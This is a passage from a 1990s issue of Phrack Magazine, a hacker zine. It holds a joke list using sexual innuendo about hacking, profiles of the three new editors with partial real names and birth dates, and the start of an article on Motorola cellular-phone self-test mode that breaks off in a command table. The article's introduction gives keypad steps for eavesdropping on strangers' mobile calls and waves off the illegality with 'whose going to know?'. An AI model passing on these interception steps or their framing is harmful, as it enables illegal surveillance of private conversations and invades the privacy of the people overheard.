  3726. - Best time to find targets is at night
  3727.  
  3728. - Backdoors are always inviting (sometimes dangerous)
  3729.  
  3730. - Don't start with the top target. Start slow and easy and look for more
  3731.   difficult ones after some success
  3732.  
  3733. - If you get rejected on the first time, don't give up. There is always
  3734.   a second chance
  3735.  
  3736. - When you just got little time to hit on the target, don't hesitate -
  3737.   a quick first try is never wrong and leaves you more time to think about
  3738.   your second step.
  3739.  
  3740. - Scanning (and probing) is neccessary. Don't give up, even your rate of
  3741.   success lays somewhere between 1% and 50%
  3742.  
  3743.  
  3744.  
  3745. SELECT THE RIGHT ONE
  3746. ====================
  3747.  
  3748. - Be selective about your targets!
  3749.  
  3750. - Try targets with tight openings
  3751.  
  3752. - Targets with many users have more experience
  3753.  
  3754. - Targets with shadows / shades are harder to enter
  3755.  
  3756. - From the inside it's easier to reach the root-climax than from the outside
  3757.  
  3758. - Many targets look uninviting from the outside, but welcome you deeply
  3759.   inside
  3760.  
  3761. - Some targets are leaking even before touching them
  3762.  
  3763. - If a target blows, it sucks
  3764.  
  3765.  
  3766.  
  3767. TECHNIQUES FOR MORE FUN
  3768. =======================
  3769.  
  3770. - After entering it, let the target become active too! Let it do some work
  3771.   and see what comes up.
  3772.  
  3773. - To protect your target, close all openings and save the key
  3774.  
  3775. - Even some targets that suck can be nice
  3776.  
  3777. - Sniffing Targets:
  3778.   For lamers and perverts
  3779.  
  3780. - Fingering Targets:
  3781.   Can be interesting...
  3782.  
  3783. - Leeching targets dry makes fun, takes time and let's them become
  3784.   kinda useless
  3785.  
  3786. - The right wrapper controls the intrusion and its consequences
  3787.  
  3788.  
  3789.  
  3790. WARNINGS
  3791. ========
  3792.  
  3793. - Remember: The number of tries is limited. After unsuccessful hits, the 
  3794.   target and its environment will become aware - start searching in a new
  3795.   area
  3796.  
  3797. - NEVER just pay to get into a target
  3798.  
  3799. - Don't fall for booby traps!
  3800.  
  3801. - When calling up targets, make sure their owner doesn't notice
  3802.  
  3803. - Don't use crack on the target... it fucks up the brain
  3804.  
  3805. - Don't fuck (up) the targets without protection
  3806.  
  3807. - Be aware: Some targets with change-root-environments can fake the
  3808.   root-orgasm, or make you feel coming inside when you are not inside
  3809.  
  3810. - Penetrating a target too hard could use up or damage your tools
  3811.  
  3812. - Try to identify faked and "cross dressed" targets before totally unwrapping
  3813.   them and finding a bad surprise
  3814.  
  3815. - When entering a virgin target the first time, you have to wipe the tracks -
  3816.   this can often be messy
  3817.  
  3818. - Remember to get out of the target when you fall asleep
  3819.  
  3820. - Never lose your mind over the beauty of a target. Always check for guards.
  3821.  
  3822. - If you don't watch out, you may get a lifelong sentence after a 9 month trial.
  3823.  
  3824.  
  3825.  
  3826.                               ==Phrack Magazine==
  3827.  
  3828.                   Volume Seven, Issue Forty-Eight, File 5 of 18
  3829.  
  3830.                             -:[ Phrack Prophile ]:-
  3831.  
  3832. This issue, we have a "very special episode" of the Phrack Prophile.  As
  3833. everyone knows, Phrack is once again in flux, and an entirely new editorial
  3834. staff is coming on board.  In an effort to introduce everyone to these three
  3835. hackers, we've had them do profiles.  Ladies and Gentlemen (yeah, like any
  3836. ladies OR gentlemen read Phrack), meet your new editors:  Daemon9, ReDragon
  3837. and Voyager.
  3838.  
  3839. -----------------------------------------------------------------------------
  3840.  
  3841.                               Prophile on Daemon9
  3842.  
  3843.  
  3844. Personal
  3845. ~~~~~~~~
  3846.         Nomenclature:  daemon9/route/infinity
  3847.         In real life:  Mike D.  (as in David, not Diamond) S.
  3848.                  DOB:  10.05.73
  3849.                Likes:  Women who aren't afraid to cry.
  3850.             Dislikes:  Hippies.  GOD, I hate hippies...
  3851.                  Ink:  Large back piece, and growing... (It's the outline of
  3852.                        a die.  (No, not as in a pair of dice, but as in a
  3853.                        computer chip...)
  3854.                Other:  Glock 19 with trigger-guard mounted laser-site.
  3855.             Passions:  Computers.  Computer Security (or lack there of).
  3856.                        Health.  Mental and Physical aptitude.
  3857.            Main URLs:  http://www.infonexus.com/~daemon9
  3858.                        ftp://ftp.infonexus.com/pub
  3859.                        mailto://route@infonexus.com
  3860.                        mailto://daemon9@netcom.com
  3861. Hardware
  3862. ~~~~~~~~
  3863. Years with Computers:  14ish
  3864.      Computers Owned:  Towers: P90/32MB/3GIG (Windows NT/Solaris/DOS-WFW)
  3865.                 Mids:  P120/32/2GIG (Linux), 486-66/16/700MB (FreeBSD),
  3866.                        486-50/16/540 (Linux)
  3867.              Laptops:  P133/16/800, (Windows NT/Linux)
  3868.                        486-75/16/500 (DOS/WFW)
  3869.       Networks Owned:  The Information Nexus (infonexus.com)
  3870.  
  3871. Media
  3872. ~~~~~
  3873.                Music:  Front242, FLA, The Goats, NIN, Diatribe, 16Volt,
  3874.                        Morphine, etc...
  3875.               Movies:  Usual Suspects, Miller's Crossing, Sneakers, Fletch
  3876.                        Army of Darkness, True Romance, NBK, etc...
  3877.                Books:  TCP/IP Illustrated vols. I-III, UNP, Applied
  3878.                        Cryptogrpahy 2nd edition, Computers and Intractablity:
  3879.                        A Guide to the Theory of NP-Completeness, and so on...
  3880.  
  3881. A Bit of History
  3882. ~~~~~~~~~~~~~~~~
  3883.  
  3884.     Ah, the days of my youth...  Carefree, happy-go-lucky, life was a big
  3885. open door to me.  One spring a very good friend of mine told me I should get
  3886. an ``Internet'' account to write him mail while he was away at school.  
  3887.     "Huh...?"
  3888. ...Was my concise reply.  I was deep into the computer thing at that time, 
  3889. but I had not gotten into the Internet yet.  Well, we went out and bought
  3890. a (at the time) $200 2400 BPS modem and got me hooked up with this brand new 
  3891. service provider, NetCom Online...  At first I merely used the thing for 
  3892. email, but soon after I taught myself all about Unix, I discovered all the 
  3893. wonders of Usenet and IRC (AKA the Big Waste).  Most people know me from my
  3894. frequent alt.2600 presense.  That's where I met Voyager.  We quickly found
  3895. that we had the same interests as far as computers and hacking went.  The 
  3896. rest is history...  Sorta.
  3897.  
  3898.  
  3899. The Theory Behind It All
  3900. ~~~~~~~~~~~~~~~~~~~~~~~~
  3901.  
  3902.     When I look back and try to figure out how the hell I got here, I have
  3903. one person to thank.  My father.  He bought me my first Commodore 64.  I can
  3904. remember hooking that archaic thing up to my TV,  writing my own adventure 
  3905. games in basic, and saving them to a tape drive.  My computer time line goes
  3906. something like this:
  3907.  
  3908. c64  Apple IIc IBM XT  IBM 286 486/33 486/66  P90 486/66 486/50 P120 P133...   
  3909. 1982   1984     1986     1987   1991   1992  1994  1995   1996  1996 1996
  3910.  
  3911.     I am not happy unless I am bathed in a contstant stream of extraneous 
  3912. RF radiation.  My room is alive with a myriad of blinking and flashing lights,
  3913. several humming fans, and hundreds of feet of fire-hazard-inducing cables.  
  3914. I have to put tin-foil on all of my windows just to keep the sun out and the 
  3915. temperature down.  You'd be amazed how well that works.
  3916.  
  3917.     The pursuit of knowledge is what led me down the path I am following.
  3918. I am simply not satisfied with knowing that something works.  I need to 
  3919. know why and how, and how to break it and then how fix it...  I do not solve a
  3920. problem by merely finding a work-around.  I slam head on into the fucking 
  3921. thing and work with it until a solution presents itself.  
  3922.     
  3923.     Intelligence, to me, is not what you know, or how much you know. It is 
  3924. the ability to reason logically and rationally when the need arises and, if 
  3925. pragmaticism is not the best approach, let intuition and chaos guide you.  
  3926. Intelligence is adaptive and ever-changing...  Memory capacity is too often 
  3927. mistaken for smarts...
  3928.  
  3929.  
  3930. People I Know
  3931. ~~~~~~~~~~~~~
  3932.  
  3933.      Linenoiz:    The reason I fell into the whole Internet scene to begin with.
  3934.         Best friends for 12 years, I would not be where I am now 
  3935.         without him.  He is one of the most intelligent people I know.
  3936.  
  3937.     Nihil:    The reason I fell into the whole hacking scene to begin with.    
  3938.         We have had our differences over the years, but our computing
  3939.         interests are too similar to let petty squabbles come in the
  3940.         way of our friendship.  The other one of the most intelligent 
  3941.         people I know.
  3942.    
  3943.    Mythrandir:    I met Myth about 2 years on alt.2600.  Sharp kid.  Very sharp.
  3944.         We think so alike on some things it's freaky.  We'll get going
  3945.         on that Tiger Team soon enuff, Jeff...!
  3946.     
  3947.      Alhambra:    Strong coder.  We did the DemonKit for Linux (and are still
  3948.         working on it..;)).  Jeremy and I also have very similar 
  3949.         interests as far as hacking goes.  I am glad he is here
  3950.         with me in the Guild.  I need more people like him.  Not a
  3951.         risky gambler, but hey, I took care of that for both of us...
  3952.  
  3953.      Halflife:    Coder supreme.  
  3954.  
  3955.  
  3956. Shouts Out To
  3957. ~~~~~~~~~~~~~
  3958.  
  3959.     Brent, Carrie, ColdFire, Crow, Halflife, Heather, Jason, Jen, Kev,
  3960.     Ka_mee, MikeP, Mudge, Shawn, SirSyko, Tim, Tom, Topher, Xanax, Vision
  3961.  
  3962.  
  3963. What I Have Done
  3964. ~~~~~~~~~~~~~~~~
  3965.  
  3966.     alt.2600
  3967.     --------
  3968.     It used to be that you could find me in that group like clockwork.  I
  3969. was always there.  Reading, posting, flaming, lurking.  That was me.  For 
  3970. years.  This is where most people probably first remember me from.  I took
  3971. it upon myself to self-moderate and answer all the questions I could possibly
  3972. handle...  I usually posted several times daily.  At last count, I posted over
  3973. 2100 times (according to  ~/.tin/posted).  I was prolific.  I have fond memories
  3974. of back then...  But, times have changed.  That group has gone almost completely
  3975. to hell (AKA the way of #hack).  Thesedays, it's a fucking miracle if I find a 
  3976. worthwhile thread to follow-up to... These days, look for me on comp.security.*, 
  3977. comp.protocols.tcpip, sci.crypt, alt.security.pgp and so on... 
  3978.  
  3979.  
  3980.     zines...
  3981.     --------
  3982.     Oh yeah, I wrote some code and a few rag-tag articles for some Zines 
  3983. out there.  Can't remember the names...
  3984.  
  3985.  
  3986.     the Guild 
  3987.     ---------
  3988.     The Guild is my group of roudy Internauts.  I started the group about
  3989. 20 months ago for several reasons, some of which are just *now* becoming 
  3990. clear to me.  For a while there, we were putting out a zine, The Infinity 
  3991. Concept, but that is on hiatus while I do Phrack.  Various members have done 
  3992. coding and exploits.  Look for more to come from the Guild...
  3993.  
  3994.  
  3995.     ftp.netcom.com/pub/da/daemon9
  3996.     -----------------------------
  3997.     Somewhere along the line about 2 years ago, I started to take 
  3998. advantage of netcom's free 5 megs of ftp space.  I put together a modest
  3999. collection of tools and whatnot (under 6 megs of stuff).  For some yet 
  4000. undiscovered reason, people flocked to the site.  I have no clue why.  It 
  4001. wasn't *that* great.  What I find even more fascinating is the fact that 
  4002. to this day people *still* go looking there for hacking paraphenelia.
  4003. The site has been vacated for almost a year now.  If you are reading this
  4004. and still have a link to my O-L-D netcom ftp site, UPDATE it to point to
  4005. ftp.infonexus.com.  I am *much* more proud of this site...  Hundreds of megs
  4006. of top-notch stuff here.  Anyway, the netcom site went down because Brian 
  4007. Smith (at the time the only member of the netcom security staff) told me I
  4008. couldn't have certian tools there for distro.  When I ignored him, he froze
  4009. my account.  This was the final catalyst in me deciding to start the 
  4010. Information Nexus...
  4011.  
  4012.  
  4013.     the Information Nexus
  4014.     ---------------------
  4015.     Ah yes... The InfoNexus...  My frustration with Netcom led me to do 
  4016. what I had been wanting to do for some time, start my own site.  This site
  4017. would be a Haven for hackers, a place where they could come and be sure to 
  4018. find only the finest in technologies and tools.  A place of much learning and
  4019. information trade.  A knowledge dumping ground.  Thus was born the Information
  4020. Nexus.  With anywhere from 6-10 machines the Nexus is a heterogenous 
  4021. environment: the OS's range from several Unix flavors, several versions of 
  4022. Windows NT, and, of course, the mundane stuff (like DOS/WFW).  The main box,
  4023. Onyx, is a heavily tweaked Linux machine.  It is a P120 with 32MB RAM and 2
  4024. GIGs of HD space.
  4025.     As it stands now, accounts are given on restricted basis, only to 
  4026. friends and people I know (or people whose reputation precedes them).  As soon
  4027. as I upgrade the link from a 28.8 modem I will start offering accounts to the 
  4028. masses, at a nomial fee.  I will also open up ftp access, allowing a greater 
  4029. number of users at all hours.
  4030.  
  4031.  
  4032.     The Infinity Concept
  4033.     --------------------
  4034.     TIC is the zine the Guild put out.  Some of the noteworthy subjects 
  4035. written on: Cryptography, Windows NT security,  Unix security,the security 
  4036. of PGP, and several coding projects...   We have done 3 issues to date, but
  4037. I have stopped further production of the zine to devote my full attention to
  4038. Phrack magazine.
  4039.  
  4040.  
  4041.     Phrack Magazine
  4042.     ---------------
  4043.     Several months back, I hopped on IRC with some of my Guild-mates and
  4044. was having a wonderous discussion on, oh, nothing.  Well, Voyager was on, and
  4045. he dragged me into a private chat.  He told me about ErikB stepping down, and
  4046. told me he and ReDragon were to take over as the new editors...  I was very 
  4047. happy for him, and told him  I would have jumped at the chance to do it.  That 
  4048. was his next question...  Since then, ReDragon, Voyager and I have been 
  4049. salivating like dogs waiting to get our hands on the legend that is Phrack 
  4050. Magazine.  
  4051.     My pledge is twofold: Timely distribution and nothing but the highest
  4052. quality articles.  We will be distributing Phrack on a regular seasonal 
  4053. rotation and will weed out all but the top-notch articles.  I plan to write
  4054. at least one article per issue.  I promise this much: You will not be 
  4055. disappointed...
  4056.  
  4057.  
  4058. -----------------------------------------------------------------------------
  4059.  
  4060.                               Prophile on ReDragon
  4061.  
  4062.  
  4063. Personal
  4064. ~~~~~~~~
  4065.  
  4066.               Handle: ReDragon
  4067.             Call Him: Dave
  4068.         Past Handles: Dr. Disk (circa '84), The Destroyer (circa '88)
  4069.        Handle Origin: Thomas Harris Book, Saab insignia, D&Dish sort of
  4070.                       name, then I decided it would be cooler (and original)
  4071.                       if it was all one word and one D.
  4072.        Date of Birth: 12/30/75
  4073.  Age of current date: do the math yourself
  4074.               Height: 5' 11"
  4075.               Weight: 175
  4076.            Eye Color: Green
  4077.           Hair Color: Brown
  4078.            Computers: Apple ][e, Atari 800, 8088, 386sx/16, 386dx/40, and
  4079.                       right now a 486/33
  4080. ------------------------------------------------------------------------------
  4081.    I got my Hayes Micromodem //e in the summer of '84.  I was eight years old
  4082. and with the help of my babysitter begged my way onto an H/P board.  I used
  4083. to read Phrack and write BASIC code, I was quite the clueless newbie for a
  4084. while.  People say age doesn't matter, but it does when you are that young.
  4085. My lameness continued, I learned Pascal, the years passed, and I started to
  4086. figure out how things worked.  I discovered Unix, it was cool.  I learned
  4087. what Crack was, I used it.  Years passed I started to figure out how things
  4088. worked.  I would go into more detail but I don't really care to tell the 
  4089. world about my life, ask me privately if you care.
  4090.  
  4091.  
  4092. ReD's Favorite Things
  4093. ~~~~~~~~~~~~~~~~~~~~~
  4094.          Women:  yes
  4095.           Cars:  Saab
  4096.          Foods:  Taco Bell (doesn't everyone?), Young animals killed cruely
  4097.          Music:  Pink Floyd, Beatles, anything not techno
  4098.        Leisure:  IRC is bad for you, just say no.
  4099.  Alcoholic Fun:  Bottled beer, Jaegermeister, Long Island Iced Teas
  4100.  
  4101.  
  4102. Most Memorable Experiences
  4103. ~~~~~~~~~~~~~~~~~~~~~~~~~~
  4104.  
  4105. Saab car trouble in Queens on the way to HOPE.
  4106. Saab car trouble on PA Turnpike on way back from Pumpcon.
  4107. Saab stranded on George Washington Bridge on way to SummerCon '95.
  4108. Saab finally breaks down on NY Turnpike on way home.
  4109. SummerCon '95 (memorable that I don't remember any of it)
  4110. SummerCon '96 (the worst organized con I have ever been to)
  4111.  
  4112.  
  4113. Some People To Mention
  4114. ~~~~~~~~~~~~~~~~~~~~~~
  4115.  
  4116. The Green Machine (for altering my life more than I can imagine)
  4117. Acker (even though you gave up on it all, wish I knew what you were doing now)
  4118. Bluesman (why didn't you tell me about C earlier?)
  4119. Zorgo (for ruining my life showing me IRC)
  4120. Wozz (I still don't believe you grew up there)
  4121. r00t (you're all a bunch of idiots, but i love you)
  4122. Asriel (we are pretty similar people, except I'm not a narq)
  4123. Max-Q (screaming at me "Nice Fuckin' Con!" after Summercon '96, I was touched)
  4124. Taran King (you were cool to me when I was nobody, I was impressed)
  4125. Sirsyko (only hacker I know that I actually trust)
  4126. ErikB (annoying him enough made for an interesting summercon and a new phrack)
  4127. l0pht (for bringing back what hacking is really about)
  4128. b (stuff?)
  4129.  
  4130. Why Phrack?
  4131. ~~~~~~~~~~~
  4132.  
  4133.    I have been in one way or another involved in the "hack scene" for more 
  4134. than half my life.  I spent a large part of that on the lower end of the
  4135. knowledge ladder, and throughout it all few people helped me along directly.
  4136. What I recognize though is that there have been scores of people that have
  4137. spent their time, at no personal gain to themselves, to help educate others
  4138. about something that they know a bit more about than the rest of us. 
  4139.    I read a lot of books to learn about hacking; I paid for them and the
  4140. authors have gotten the money they deserve.  I learned quite a bit from
  4141. college; I paid quite a lot for college.  But I have learned about hacking
  4142. most of all from hackers.  How can I repay those that have given me so much?
  4143.    We are rather fortunate to be in a position where we actually can give 
  4144. something back to them.  We can give them a new generation of hackers that
  4145. have the same opportunities to learn and to share their knowledge that we
  4146. had.  We can show them that we haven't forgotten about where we started; we
  4147. haven't forgotten about why we are hackers; and we haven't forgotten that
  4148. to be a hacker is a passion, and it is something we are proud of.  
  4149.    To my peers, consider giving something back to the community.  To the next
  4150. generation, learn from what we give and explore from what you learn; it will
  4151. soon be your turn to take our place.  And to those that made this all possible,
  4152. to those that gave their own knowledge in the name of the community, the
  4153. hundreds of authors, the ten editors, and most of all the readers: Thank You.
  4154.  
  4155.                                                   -ReDragon
  4156.  
  4157. -----------------------------------------------------------------------------
  4158.  
  4159.  
  4160.                               Prophile on Voyager
  4161.  
  4162. Personal
  4163. ~~~~~~~~
  4164.            Handle:  Voyager
  4165.          Call him:  Will
  4166.     Date of Birth:  06/23/69
  4167.               Age:  27
  4168.            Height:  6'
  4169.            Weight:  200lb
  4170.   Computers owned:  486DX4-100(FreeBSD), 486SX25(OS/2) and P-75 laptop(PC-DOS)
  4171.  
  4172.  
  4173. How did this handle originate?  I jumped on IRC one day and didn't want
  4174. to use my real handle, so I made this one up on the spur of the moment.
  4175.  
  4176.  
  4177. How I Got Started
  4178. ~~~~~~~~~~~~~~~~~
  4179. I didn't start hacking computers until I went to college.  I taught
  4180. myself to use PRIMOS and I started hacking because the 150k disk quota I
  4181. was given wasn't large enough for me to compile decent sized programs.
  4182.  
  4183. I started hacking in '87 and didn't run into another hacker until '91.
  4184. I got Internet access and I found Phrack on ftp.eff.org.  Wow!  I
  4185. thought, these people are serious.  Shortly thereafter, I compiled the
  4186. VMS client for IRC and I was talking to other hacker types on a regular
  4187. basis.
  4188.  
  4189. About that time, I put up a BBS.  The system is now known as "Hacker's
  4190. Haven."  The system has become fairly popular, with over 1,400 users
  4191. surviving the last 90 day purge.
  4192.  
  4193. In '92, I wrote a "bot" in the IRC scripting language and called it
  4194. "HackSrv." HackSrv distributed H/P files on demand and also opped all of
  4195. us regular #hack cronies.
  4196.  
  4197. Late in '92 I moved to Atlanta and started organizing 2600 Meetings.  We
  4198. had a blast.  We held them at my apartment.  I can't imagine what my
  4199. neighbors thought.  I still remember 40 people in my tiny living room
  4200. huddled around the TV watching sneakers.  One week, we were hacking on
  4201. one terminal, IRC'ing on another, watching a lockpicking demo on the
  4202. front door, sorting trash on the balcony, having firearms instruction in
  4203. the bedroom, and setting off bottle rockets from the kitchen to the
  4204. living room.  The last is not a good idea, by the way.
  4205.  
  4206. Over the course of the next few years, #hack went completely to hell.
  4207. The place became littered with clueless newbies asking clueless newbie
  4208. questions.  Other people, usually even less clueful newbies, would kick
  4209. and ban people for asking questions.  This effectively stopped all useful
  4210. conversation on #hack, as anyone who brought up a technical topic was 
  4211. likely to be kicked immediately.  This led to a group of #hack ChanOp's
  4212. who had absolutely no technical knowledge and instead wasted away the 
  4213. hours stroking their egos.  I was annoyed by the incredible cluelessness 
  4214. that had taken over the once fine channel and decided to do something 
  4215. about it.
  4216.  
  4217. Towards that end, I wrote the #hack FAQ.  The #hack FAQ was to be given
  4218. to new people to bring them up to speed in a short amount of time.  This, 
  4219. I reasoned, would raise the intellectual level on conversation on #hack.
  4220. It would also set the tone for conversation on #hack back to the technical
  4221. atmosphere I had known just a few years earlier.  Later, the #hack FAQ 
  4222. became the alt.2600/#hack FAQ and it's purpose was expanded to cover 
  4223. the newsgroup alt.2600.
  4224.  
  4225. In the Summer of '94 I moved to Denver and joined up with TNO.  TNO is a
  4226. group of friends who share an avid interest in computer and telephone
  4227. security.  Today, TNO consists of Cavalier, DisordeR, Major, Edison and
  4228. myself.
  4229.  
  4230. Over the last few years, I've written for Phrack, 2600, CoTNo and FUCK.
  4231. I've wanted to be Phrack editor since Taran King retired.  When ErikB
  4232. told me he was looking to retire from the job, and that I was being
  4233. considered as the next Phrack editor, it hit me just how big of a
  4234. responsibility this was.  I spoke with ReDragon (Editor of FEH) and
  4235. daemon9 (Editor of The Infinity Concept).  Together, we agreed to set
  4236. aside our current e-zine's (I was the current Editor of CoTNo) and focus
  4237. all of our attention on Phrack.  We have received offers of support from
  4238. many old and new people in the hacking community.  I am looking forward
  4239. to a bright future for Phrack.
  4240.  
  4241.  
  4242. Interests
  4243. ~~~~~~~~~
  4244.               Women:  Sharp and quick
  4245.                Cars:  Big and fast
  4246.                Food:  Spicy to the point of pain
  4247.               Music:  Rock and Roll
  4248. Favorite performers:  Jimmy Buffett, The Eagles
  4249.     Favorite author:  Joel Rosenberg
  4250.       Favorite Book:  Unix Power Tools
  4251.  
  4252.  
  4253. Most Memorable Experiences
  4254. ~~~~~~~~~~~~~~~~~~~~~~~~~~
  4255.  
  4256. KL kicking me off #hack for saying that hacking was wrong.
  4257.  
  4258. Captain Hemp hiding my address and phone number in a bag of trash.
  4259.  
  4260. Reading my first sniffer log.
  4261.  
  4262. Getting arrested with Captain Hemp outside of a Southern Bell facility.
  4263.  
  4264. Finding the switch with the unpassworded root account.
  4265.  
  4266. Being pulled over on the way to HoHoCon while we were moshing in the
  4267. van.
  4268.  
  4269. DeadKat and Cavalier doing the root dance.
  4270.  
  4271. Being followed by the security guard with the baby seat.
  4272.  
  4273. Major and I *not* getting mugged and beaten by the gang of thieves, even
  4274. though he could barely stand up and neither of us were carrying at the
  4275. time.
  4276.  
  4277.  
  4278. Some People To Mention
  4279. ~~~~~~~~~~~~~~~~~~~~~~
  4280.  
  4281. Major :         You are, at the same time, one of the best people I have
  4282.                 ever known and one of the worst people I have ever
  4283.                 known.  I am just glad I am on your side, and you mine.
  4284.                 I trust you with my life, and with a few of the 
  4285.         situations we've been through, that's not just talking.
  4286.  
  4287. Cavalier :      You taught us all what was important in a group.  Your
  4288.                 steadiness and common sense has helped carry TNO through
  4289.                 the dark times.  As always, I'm glad to have you here.
  4290.                 You can always be counted on, and that means a great
  4291.                 deal to me.
  4292.  
  4293. The Presence :  It is always a pleasure to talk to you.  You have taught
  4294.                 me more than anyone else in the scene.  You will always
  4295.                 be one of the best.  The strength of your ethics will
  4296.                 guide you through where lesser men would fail.
  4297.  
  4298. Captain Hemp :  There's no one I'd rather be arrested with.
  4299.  
  4300. NoCar / K :     Congratulations on your new system!
  4301.  
  4302.  
  4303. The Final Question
  4304. ~~~~~~~~~~~~~~~~~~
  4305. I have met quite a few hackers.  Very few have been "geeks" in the
  4306. traditional sense of the term.  I have met hacker business people,
  4307. hacker jocks, hacker criminals, hacker stoners, hacker programmers, and
  4308. hacker skater punks.  It's a sport for just about anyone with
  4309. intelligence, dedication, and absolutely no respect for authority.
  4310.  
  4311. _______________________________________________________________________________
  4312.  
  4313.  
  4314.                               ==Phrack Magazine==
  4315.  
  4316.                  Volume Seven, Issue Forty-Eight, File 6 of 18
  4317.  
  4318.  
  4319.                       Motorola Command Mode Information
  4320.  
  4321.                       Written and typed up by Cherokee
  4322.  
  4323.  
  4324.  
  4325. NOTE: The following text is only a few pages from an official Motorola
  4326.       handbook that I received, thanks to Ob1.
  4327.       
  4328.                         THIS IS NOT A COMPLETE HANDBOOK 
  4329.       
  4330.       but it is very useful as a guide to learning how to use the self
  4331.       test instructions on the Motorola series of cellular phones.
  4332.  
  4333.       To actually enter the self test modes, THERE ARE SEVERAL STAGES
  4334.       BEFORE HAND THAT NEED TO BE DONE.  They depend upon what type of
  4335.       Motorola mobile phone you possess.  To my knowledge, the self test
  4336.       mode instructions are the same on every Motorola phone, the only
  4337.       difference will be how you enter the test mode. That I leave up to
  4338.       you to find out as there are lots of help files already out there,
  4339.       unless, there is a great demand for it.
  4340.  
  4341.       I will now show you how easy it is to use the test mode to your
  4342.       advantage.
  4343.  
  4344.       Say, your the average peeping Tom or Sally (what hacker isn't?),
  4345.       this is how to listen in on other peoples mobile conversations.
  4346.  
  4347.       1.Enter the test mode.
  4348.       2.Turn the speaker on (08#) also called un-muting the receive audio. 
  4349.       3.Tune into a channel(11xxxx#) (where x can range from 0 to
  4350.       600[TACS] and 1329 to 2047[ETACS].)... Although I'm not 100% sure
  4351.       of the channel mapping, (theres conversations in the range between
  4352.       600 to 1329), you'd do best to stick to playing around with these.
  4353.  
  4354.       You may have to try several different channels, to pick up a
  4355.       conversation, not every channel is occupied with a user.  I
  4356.       suggest you try 0 to 50, this is almost guaranteed to give you a
  4357.       result. BTW, it is actually illegal to monitor mobile
  4358.       communications without the consent of both parties, but hey, whose
  4359.       going to know? :-)
  4360.  
  4361.       Displaying information - Some handsets only allow display 1 line,
  4362.       and therefore you wont be able to see all of the information being
  4363.       sent to you. There are 2 ways around this. 1. Is to go and get a
  4364.       handset which can display 2 lines of information. 2. to send the
  4365.       data to your computer to display on the screen, apparently the
  4366.       data is sent and received in an unfamiliar packet format, and will
  4367.       need to be decoded.
  4368.  
  4369.       FINAL NOTE: 
  4370.       There are several conflicting sources for some commands, this is
  4371.       because of different versions of the ROM, so I'm putting all of
  4372.       the test codes bundled together in this file, and will update the
  4373.       list if there are any significant changes, or I find out about a
  4374.       new command in a later ROM version.
  4375.  
  4376.       Just one last final note to say hi to Davex[thanks for the NAM
  4377.       guide], Ratscabies, Maelstrom, Hi.T.Moonweed and Ob1.
  4378.  
  4379.  ----------------------------------------------------------------------------
  4380.  
  4381.                      Motorola Self Test Mode Instructions
  4382.                      ------------------------------------
  4383.  
  4384.  
  4385. 1. INTRODUCTION
  4386.  
  4387. Portable radio telephones are equipped for self-test, allowing service
  4388. personnel to control and monitor radiotelephone functions via the
  4389. telephone keypad.  The self-test mode operates at two levels:
  4390.  
  4391. 1) a status display level, which allows the portable telephone to
  4392. operate normally while providing status indications in the display and;
  4393.  
  4394. 2) the service level, which removes the portable telephone from normal
  4395. service and allows commands to be entered through the keypad to
  4396. 'manually' control the operation of the radiotelephone.
  4397.  
  4398. 2. OPERATING PROCEDURES
  4399.  
  4400. 2.1 STATUS DISPLAY LEVEL OF SELF-TEST
  4401.  
  4402. This level of self-test is entered by momentarily shorting pin 6 of J2
  4403. to ground, while turning the radiotelephone on.  The self-test mode can
  4404. also be entered using the portable radiotelephone test kit (RTL4228A and
  4405. RTL4229A).
  4406.  
  4407. In this level of self-test mode the radiotelephone will place and
  4408. receive calls as normal except the radiotelephone displays status
  4409. information. The displayed status information alternates between the
  4410. channel number and RSSI status information, and the primary status
  4411. information (SAT frequency, carrier state, signaling tone state, power
  4412. level, voice/data channel mode, and Rx and Tx audio states).  The format
  4413. and explanation of this status information is given in Table 1 under 02#
  4414. Radio Status Request.
  4415.  
  4416. When dialing a phone number, the display of the status in formation
  4417. ceases when the first digit of the phone number is entered.  When the
  4418. Snd button (or End or Clr) is pressed, the status information display
  4419. resumes.
  4420.  
  4421. 2.2 SERVICING LEVEL OF SELF-TEST
  4422.  
  4423.   |-----------------------------------------------------------
  4424.   |                             NOTE
  4425.   |-----------------------------------------------------------
  4426.   |     While in the servicing level mode of self-test, the
  4427.   |     display does not alternate.  Only the primary status
  4428.   |     information is displayed.
  4429.   |-----------------------------------------------------------
  4430.  
  4431. The servicing level allows the servicing personnel to take control of
  4432. the radio operation by entering the test commands through the telephone
  4433. keypad.  Such parameters as operating channel, output power level
  4434. muting, and data transmission can all be selected by entering the
  4435. corresponding commands.  The servicing level is entered from the status
  4436. display level by pressing the (#) button.  At this time the radio
  4437. telephones cease to function automatically in the radiotelephone system.
  4438. Table 1 shows the test commands and the corresponding results.
  4439.  
  4440.  
  4441. INTERNATIONAL CELLULAR PORTABLE
  4442.  
  4443. Table 1. Test Commands For Self-Test Mode
  4444.  
  4445. |---------------------------------------------------------------------------
  4446. | NOTES:
  4447. | 1. Each command consists of at least two digits entered from the telephone
  4448. |    keypad with the entry terminated using the (#) key.
  4449. | 2. If the command relates to a test function with multiple data displays,
  4450. |    the (#) key is used to pause at scanning data or to step through
  4451. |    sequential test functions.  Entering the (#) key during a pause time
  4452. |    resumes scanning.
  4453. | 3. For commands that initiate an action that requires a response or that 
  4454. |    accumulates error counts, the (#) key terminates the test.
  4455. |---------------------------------------------------------------------------
  4456. |Keypad Entry | Command Description | Status  |        Result
  4457. |             |                     | Display |
  4458. |-------------|-------------------------------------------------------------
  4459. |       #     |Enter Test Command   |         |
  4460. |             |Mode                 |         |
  4461. |-------------|---------------------|---------|-----------------------------
  4462. |      01#    |Restart (Re-enter DC |         |
  4463. |             |power startup routine|         |
  4464. |-------------|---------------------|---------|-----------------------------
  4465. |      02#    |Radio Status Request | AAAA=BB | AAAA=Channel Number(decimal)
  4466. |             |                     |         | BB=RSSI reading for channel
  4467. |             |                     | CDEFGHI |   C=SAT Frequency
  4468. |             |                     |         |      0=5970 Hz
  4469. |             |                     |         |      1=6000 Hz
  4470. |             |                     |         |      2=6030 Hz
  4471. |             |                     |         |      3=No Lock
  4472. |             |                     |         |   D=Carrier(1=ON)
  4473. |             |                     |         |   E=Signaling Tone(1=ON)
  4474. |             |                     |         |   F=Power Attention Level(0-7)
  4475. |             |                     |         |   G=Mode(1=control channel
  4476. |             |                     |         |     0=voice channel
  4477. |             |                     |         |   H=Receive Audio Mute(1=muted)
  4478. |             |                     |         |   I=Transmit Audio Mute(1=muted)
  4479. |             |                     |         | When the radiotelephone is
  4480. |             |                     |         | operating in the status display
  4481. |             |                     |         | level of self-test, the
  4482. |             |                     |         | information that is displayed
